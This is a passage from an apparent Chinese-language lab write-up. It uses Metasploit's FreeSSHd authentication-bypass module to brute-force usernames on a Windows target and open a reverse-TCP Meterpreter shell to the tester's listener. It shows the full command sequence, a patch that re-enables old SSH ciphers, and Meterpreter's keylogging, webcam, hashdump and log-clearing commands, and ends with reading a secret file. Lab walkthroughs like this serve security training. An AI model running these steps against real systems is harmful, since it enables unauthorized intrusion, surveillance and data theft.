inet6 fe80::e54a:6494:983f:7c99/64 scope link stable-privacy
valid_lft forever preferred_lft forever
11: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.200.4/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::b555:927b:f447:b4c2/64 scope link stable-privacy
valid_lft forever preferred_lft forever
開始做設定:
msf6 exploit(windows/ssh/freesshd_authbypass) > set lhost 192.168.200.3
lhost => 192.168.200.3
msf6 exploit(windows/ssh/freesshd_authbypass) > set rhosts 172.16.19.2
rhosts => 172.16.19.2
msf6 exploit(windows/ssh/freesshd_authbypass) > set rport 45
rport => 45
msf6 exploit(windows/ssh/freesshd_authbypass) > show options
Module options (exploit/windows/ssh/freesshd_authbypass):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.19.2 yes The target host(s), see https://
docs.metasploit.com/docs/using-m
etasploit/basics/using-metasploi
t.html
RPORT 45 yes The target port (TCP)
SSL false no Negotiate SSL for incoming conne
ctions
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH no The URI to use for this exploit
(default is random)
USERNAME no A specific username to try
USER_FILE /usr/share/metasploi yes File containing usernames, one p
t-framework/data/wor er line
dlists/unix_users.tx
t
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to
listen on. This must be an address on t
he local machine or 0.0.0.0 to listen o
n all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thr
ead, process, none)
LHOST 192.168.200.3 yes The listen address (an interface may b
e specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PowerShell
View the full module info with the info, or info -d command.
執行:
msf6 exploit(windows/ssh/freesshd_authbypass) > run
[*] Started reverse TCP handler on 192.168.200.3:4444
[*] 172.16.19.2:45 - Trying username '4Dgifts'
[-] 172.16.19.2:45 - Exploit failed: Net::SSH::Exception could not settle on encryption_client algorithm
Server encryption_client preferences: aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc@lysator.liu.se
Client encryption_client preferences: aes256-ctr,aes192-ctr,aes128-ctr
[*] Exploit completed, but no session was created.
aaa阿,不知道為什麼噴錯了,看起來是不支援舊的加密演算法,google後找到下面這一篇:
Configure the Metasploit SSH client to support aes256-cbc - Information Security Stack Exchange
於是依照文章解決方式,輸入以下指令:
┌──(kali㉿kali)-[~]
└─$ find /usr/share/metasploit-framework -type f -name algorithms.rb
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb
┌──(kali㉿kali)-[~]
└─$ sudo vim /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb
用vim打開檔案後,會發現原本內容包含以下:
DEFAULT_ALGORITHMS = {
host_key: %w[ecdsa-sha2-nistp521-cert-v01@openssh.com
ecdsa-sha2-nistp384-cert-v01@openssh.com
ecdsa-sha2-nistp256-cert-v01@openssh.com
ecdsa-sha2-nistp521
ecdsa-sha2-nistp384
ecdsa-sha2-nistp256
ssh-rsa-cert-v01@openssh.com
ssh-rsa-cert-v00@openssh.com
ssh-rsa],
kex: %w[ecdh-sha2-nistp521
ecdh-sha2-nistp384
ecdh-sha2-nistp256
diffie-hellman-group-exchange-sha256
diffie-hellman-group14-sha1],
encryption: %w[aes256-ctr aes192-ctr aes128-ctr **aes256-cbc**],
最主要是encryption要加舊的演算法,加成下圖,儲存後離開。
重新啟動metasploit,把剛剛的步驟重來一遍:
┌──(root㉿kali)-[~/PT_day2]
└─# msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: You can use help to view all
available commands
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search freessh
Matching Modules
================
# Name Disclosure Date Rank Che ck Description
- ---- --------------- ---- --- -- -----------
0 exploit/windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
1 exploit/windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
2 exploit/windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass
Interact with a module by name or index. For example info 2, use 2 or use exploi t/windows/ssh/freesshd_authbypass
msf6 > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/ssh/freesshd_authbypass) > show options
Module options (exploit/windows/ssh/freesshd_authbypass):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://
docs.metasploit.com/docs/using-m
etasploit/basics/using-metasploi
t.html
RPORT 22 yes The target port (TCP)
SSL false no Negotiate SSL for incoming conne
ctions
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH no The URI to use for this exploit
(default is random)
USERNAME no A specific username to try
USER_FILE /usr/share/metasploi yes File containing usernames, one p
t-framework/data/wor er line
dlists/unix_users.tx
t
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwpreques t,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to
listen on. This must be an address on t
he local machine or 0.0.0.0 to listen o
n all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thr
ead, process, none)
LHOST 192.168.18.192 yes The listen address (an interface may b
e specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PowerShell
View the full module info with the info, or info -d command.
msf6 exploit(windows/ssh/freesshd_authbypass) > set lhost 192.168.200.3
lhost => 192.168.200.3
msf6 exploit(windows/ssh/freesshd_authbypass) > set rhosts 172.16.19.2
rhosts => 172.16.19.2
msf6 exploit(windows/ssh/freesshd_authbypass) > set rport 45
rport => 45
msf6 exploit(windows/ssh/freesshd_authbypass) > run
[*] Started reverse TCP handler on 192.168.200.3:4444
[*] 172.16.19.2:45 - Trying username '4Dgifts'
[*] 172.16.19.2:45 - Trying username 'abrt'
[*] 172.16.19.2:45 - Trying username 'adm'
[*] 172.16.19.2:45 - Trying username 'admin'
[*] 172.16.19.2:45 - Trying username 'administrator'
[*] 172.16.19.2:45 - Trying username 'anon'
[*] 172.16.19.2:45 - Trying username '_apt'
[*] 172.16.19.2:45 - Trying username 'arpwatch'
[*] 172.16.19.2:45 - Trying username 'auditor'
[*] 172.16.19.2:45 - Trying username 'avahi'
[*] 172.16.19.2:45 - Trying username 'avahi-autoipd'
[*] 172.16.19.2:45 - Trying username 'backup'
[*] 172.16.19.2:45 - Trying username 'bbs'
[*] 172.16.19.2:45 - Trying username 'beef-xss'
[*] 172.16.19.2:45 - Trying username 'bin'
[*] 172.16.19.2:45 - Trying username 'bitnami'
[*] 172.16.19.2:45 - Trying username 'checkfs'
[*] 172.16.19.2:45 - Trying username 'checkfsys'
[*] 172.16.19.2:45 - Trying username 'checksys'
[*] 172.16.19.2:45 - Trying username 'chronos'
[*] 172.16.19.2:45 - Trying username 'chrony'
[*] 172.16.19.2:45 - Trying username 'cmwlogin'
[*] 172.16.19.2:45 - Trying username 'cockpit-ws'
[*] 172.16.19.2:45 - Trying username 'colord'
[*] 172.16.19.2:45 - Trying username 'couchdb'
[*] 172.16.19.2:45 - Trying username 'cups-pk-helper'
[*] 172.16.19.2:45 - Trying username 'daemon'
[*] 172.16.19.2:45 - Trying username 'dbadmin'
[*] 172.16.19.2:45 - Trying username 'dbus'
[*] 172.16.19.2:45 - Trying username 'Debian-exim'
[*] 172.16.19.2:45 - Trying username 'Debian-snmp'
[*] 172.16.19.2:45 - Trying username 'demo'
[*] 172.16.19.2:45 - Trying username 'demos'
[*] 172.16.19.2:45 - Trying username 'diag'
[*] 172.16.19.2:45 - Trying username 'distccd'
[*] 172.16.19.2:45 - Trying username 'dni'
[*] 172.16.19.2:45 - Trying username 'dnsmasq'
[*] 172.16.19.2:45 - Trying username 'dradis'
[*] 172.16.19.2:45 - Trying username 'EZsetup'
[*] 172.16.19.2:45 - Trying username 'fal'
[*] 172.16.19.2:45 - Trying username 'fax'
[*] 172.16.19.2:45 - Trying username 'ftp'
[*] 172.16.19.2:45 - Trying username 'games'
[*] 172.16.19.2:45 - Trying username 'gdm'
[*] 172.16.19.2:45 - Trying username 'geoclue'
[*] 172.16.19.2:45 - Trying username 'gnats'
[*] 172.16.19.2:45 - Trying username 'gnome-initial-setup'
[*] 172.16.19.2:45 - Trying username 'gopher'
[*] 172.16.19.2:45 - Trying username 'gropher'
[*] 172.16.19.2:45 - Trying username 'guest'
[*] 172.16.19.2:45 - Trying username 'haldaemon'
[*] 172.16.19.2:45 - Trying username 'halt'
[*] 172.16.19.2:45 - Trying username 'hplip'
[*] 172.16.19.2:45 - Trying username 'inetsim'
[*] 172.16.19.2:45 - Trying username 'informix'
[*] 172.16.19.2:45 - Trying username 'install'
[*] 172.16.19.2:45 - Trying username 'iodine'
[*] 172.16.19.2:45 - Trying username 'irc'
[*] 172.16.19.2:45 - Trying username 'jet'
[*] 172.16.19.2:45 - Trying username 'karaf'
[*] 172.16.19.2:45 - Trying username 'kernoops'
[*] 172.16.19.2:45 - Trying username 'king-phisher'
[*] 172.16.19.2:45 - Trying username 'landscape'
[*] 172.16.19.2:45 - Trying username 'libstoragemgmt'
[*] 172.16.19.2:45 - Trying username 'libuuid'
[*] 172.16.19.2:45 - Trying username 'lightdm'
[*] 172.16.19.2:45 - Trying username 'list'
[*] 172.16.19.2:45 - Trying username 'listen'
[*] 172.16.19.2:45 - Trying username 'lp'
[*] 172.16.19.2:45 - Trying username 'lpadm'
[*] 172.16.19.2:45 - Trying username 'lpadmin'
[*] 172.16.19.2:45 - Trying username 'lxd'
[*] 172.16.19.2:45 - Trying username 'lynx'
[*] 172.16.19.2:45 - Trying username 'mail'
[*] 172.16.19.2:45 - Trying username 'man'
[*] 172.16.19.2:45 - Trying username 'me'
[*] 172.16.19.2:45 - Trying username 'messagebus'
[*] 172.16.19.2:45 - Trying username 'miredo'
[*] 172.16.19.2:45 - Trying username 'mountfs'
[*] 172.16.19.2:45 - Trying username 'mountfsys'
[*] 172.16.19.2:45 - Trying username 'mountsys'
[*] 172.16.19.2:45 - Trying username 'mysql'
[*] 172.16.19.2:45 - Trying username 'news'
[*] 172.16.19.2:45 - Trying username 'noaccess'
[*] 172.16.19.2:45 - Trying username 'nobody'
[*] 172.16.19.2:45 - Executing payload via Powershell...
[*] Sending stage (175686 bytes) to 172.16.19.2
[*] Meterpreter session 1 opened (192.168.200.3:4444 -> 172.16.19.2:49233) at 20 23-02-26 01:53:57 -0500
經過爆破,知道username是nobody,第二小題也早就解開,是45 port。
第三小題:
meterpreter > search -f secret.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\arnold\Documents\secret.txt 7 2019-11-06 09:44:07 -0500
可以藉由?指令,來了解可以用什麼指令操縱被入侵的電腦:
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unic Disables encoding of unicode strings
ode_encoding
enable_unico Enables encoding of unicode strings
de_encoding
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current pr
ocess
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target pro
cess
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_sen Send keystrokes
d
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_star Start capturing keystrokes
t
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_strea Play a video stream from the specified webcam
m
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
注意路徑不能只打一個反斜線,會被當成是其他東西:
meterpreter > cat c:\\Users\\arnold\\Documents\\secret.txt
Eur3K@!meterpreter >
也可以打shell指令,直接用對方電腦的cmd:
meterpreter > shell
Process 3884 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd /
cd /
C:\>dir /s secret.txt
dir /s secret.txt
Volume in drive C has no label.
Volume Serial Number is 18FD-17B5
Directory of C:\Users\arnold\Documents
2019/11/06 ?? 10:44 7 secret.txt
1 File(s) 7 bytes
Total Files Listed:
1 File(s) 7 bytes
0 Dir(s) 122,211,835,904 bytes free
C:\>cd C:\Users\arnold\Documents
cd C:\Users\arnold\Documents
C:\Users\arnold\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 18FD-17B5
Directory of C:\Users\arnold\Documents
2019/11/06 ?? 10:43 <DIR> .
2019/11/06 ?? 10:43 <DIR> ..
2019/11/06 ?? 10:44 7 secret.txt
1 File(s) 7 bytes
2 Dir(s) 122,211,835,904 bytes free
C:\Users\arnold\Documents>type secret.txt
type secret.txt
Eur3K@!
